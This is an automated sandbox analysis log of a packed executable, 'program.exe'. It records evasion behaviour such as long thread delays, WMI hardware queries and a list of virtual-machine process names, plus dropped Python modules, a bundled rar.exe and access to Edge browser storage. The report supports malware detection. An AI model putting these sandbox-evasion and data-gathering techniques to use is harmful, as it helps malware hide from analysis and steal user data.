              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID=&quot;1&quot;} WHERE ResultClass=Win32_NetworkAdapterConfiguration
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element=&quot;Win32_NetworkAdapter.DeviceID=\&quot;1\&quot;&quot;
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3325Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2838Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2566
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4400
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1619
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4206
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 647
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3642
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1427
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3555
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 657
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2583
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1685
              Source: C:\Users\user\Desktop\program.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73082\unicodedata.pydJump to dropped file
              Source: C:\Users\user\Desktop\program.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73082\_socket.pydJump to dropped file
              Source: C:\Users\user\Desktop\program.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73082\_lzma.pydJump to dropped file
              Source: C:\Users\user\Desktop\program.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73082\_sqlite3.pydJump to dropped file
              Source: C:\Users\user\Desktop\program.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73082\_hashlib.pydJump to dropped file
              Source: C:\Users\user\Desktop\program.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73082\_ssl.pydJump to dropped file
              Source: C:\Users\user\Desktop\program.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73082\_decimal.pydJump to dropped file
              Source: C:\Users\user\Desktop\program.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73082\_queue.pydJump to dropped file
              Source: C:\Users\user\Desktop\program.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73082\select.pydJump to dropped file
              Source: C:\Users\user\Desktop\program.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73082\_bz2.pydJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\tgmup5d5\tgmup5d5.dllJump to dropped file
              Source: C:\Users\user\Desktop\program.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73082\python313.dllJump to dropped file
              Source: C:\Users\user\Desktop\program.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73082\_ctypes.pydJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeEvaded block: after key decisiongraph_83-39779
              Source: C:\Users\user\Desktop\program.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-17526
              Source: C:\Users\user\Desktop\program.exeAPI coverage: 5.6 %
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7680Thread sleep count: 3325 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8056Thread sleep time: -13835058055282155s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7740Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7672Thread sleep count: 2838 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8068Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7748Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7676Thread sleep count: 2566 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8100Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7756Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7404Thread sleep count: 315 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6160Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7656Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8500Thread sleep time: -15679732462653109s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8368Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5780Thread sleep count: 4206 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7408Thread sleep count: 647 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7648Thread sleep time: -3689348814741908s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7096Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7076Thread sleep count: 3642 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8168Thread sleep count: 1427 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8176Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6768Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9064Thread sleep count: 3555 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9052Thread sleep count: 657 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8964Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9000Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7788Thread sleep count: 2583 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7884Thread sleep count: 1685 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4416Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7824Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\program.exeCode function: 0_2_00007FF6B75083C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF6B75083C0
              Source: C:\Users\user\Desktop\program.exeCode function: 0_2_00007FF6B7509280 FindFirstFileExW,FindClose,0_2_00007FF6B7509280
              Source: C:\Users\user\Desktop\program.exeCode function: 0_2_00007FF6B7521874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF6B7521874
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FF6B7509280 FindFirstFileExW,FindClose,1_2_00007FF6B7509280
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FF6B7521874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_00007FF6B7521874
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FF6B75083C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,1_2_00007FF6B75083C0
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE746EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,83_2_00007FF64FE746EC
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FEB88E0 FindFirstFileExA,83_2_00007FF64FEB88E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE6E21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,83_2_00007FF64FE6E21C
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFE01311230 GetSystemInfo,1_2_00007FFE01311230
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\Jump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\Jump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Jump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\Jump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Jump to behavior
              Source: C:\Users\user\Desktop\program.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\Jump to behavior
              Source: getmac.exe, 00000042.00000003.1833496519.000001556908B000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000042.00000003.1833684929.000001556909F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000042.00000002.1834820672.00000155690B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V
              Source: program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: fvmwaretray
              Source: program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxservice
              Source: program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: fvmwareservice
              Source: program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Rf8vmware
              Source: program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareuser
              Source: getmac.exe, 00000042.00000003.1833496519.000001556908B000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000042.00000003.1833684929.000001556909F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000042.00000002.1834820672.00000155690D1000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000042.00000003.1833659004.00000155690CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SetPropValue.sSubKeyName("SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage");
              Source: program.exe, 00000001.00000002.2105991946.000001B5FE050000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000042.00000003.1833496519.000001556908B000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000042.00000003.1833684929.000001556909F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000042.00000002.1834820672.00000155690B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmsrvc
              Source: program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: decodeqemu-ga
              Source: program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: f15vmsrvc
              Source: getmac.exe, 00000042.00000003.1833496519.000001556908B000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000042.00000003.1833659004.00000155690CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: __PARAMETERSSYSTEM\CurrentControlSet\Services\Hyper-V\LinkageExportF*
              Source: program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwaretray
              Source: program.exe, 00000001.00000003.1850672429.000001B5FEE1E000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.2000044221.000001B5FF37B000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1851308309.000001B5FE3D6000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1848691520.000001B5FE3AF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1851854262.000001B5FE3DD000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1850513185.000001B5FF37B000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.2000623044.000001B5FF0FC000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000002.2112057477.000001B5FF1CD000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1846023992.000001B5FF1CD000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000001.00000003.1852482514.000001B5FEE1F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
              Source: program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: f4vmusrvc
              Source: program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: fvboxtray
              Source: program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: fvmtoolsd
              Source: getmac.exe, 00000042.00000003.1833496519.000001556908B000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000042.00000003.1833684929.000001556909F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-VL
              Source: getmac.exe, 00000042.00000002.1834820672.00000155690D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: __PARAMETERSSYSTEM\CurrentControlSet\Services\Hyper-V\LinkageExport-*
              Source: program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxtray
              Source: program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: qemu-ga
              Source: program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmware
              Source: getmac.exe, 00000042.00000003.1833496519.000001556908B000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000042.00000003.1833684929.000001556909F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000042.00000002.1834820672.00000155690B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_NetworkProtocolHyper-V RAWHyper-VRAWHyper-V RAW
              Source: program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmusrvc
              Source: getmac.exe, 00000042.00000003.1833496519.000001556908B000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000042.00000002.1834820672.00000155690D1000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000042.00000003.1833659004.00000155690CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage
              Source: program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: kfvboxservice(
              Source: program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmtoolsd
              Source: program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: fvmwareuser
              Source: program.exe, 00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareservice
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeCode function: 0_2_00007FF6B750D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6B750D12C
              Source: C:\Users\user\Desktop\program.exeCode function: 1_2_00007FFDFAF10350 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,1_2_00007FFDFAF10350
              Source: C:\Users\user\Desktop\program.exeCode function: 0_2_00007FF6B7523480 GetProcessHeap,0_2_00007FF6B7523480
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\program.exeCode function: 0_2_00007FF6B750C8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF6B750C8A0
              Source: C:\Users\user\Desktop\program.exeCode function: 0_2_00007FF6B750D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6B750D12C
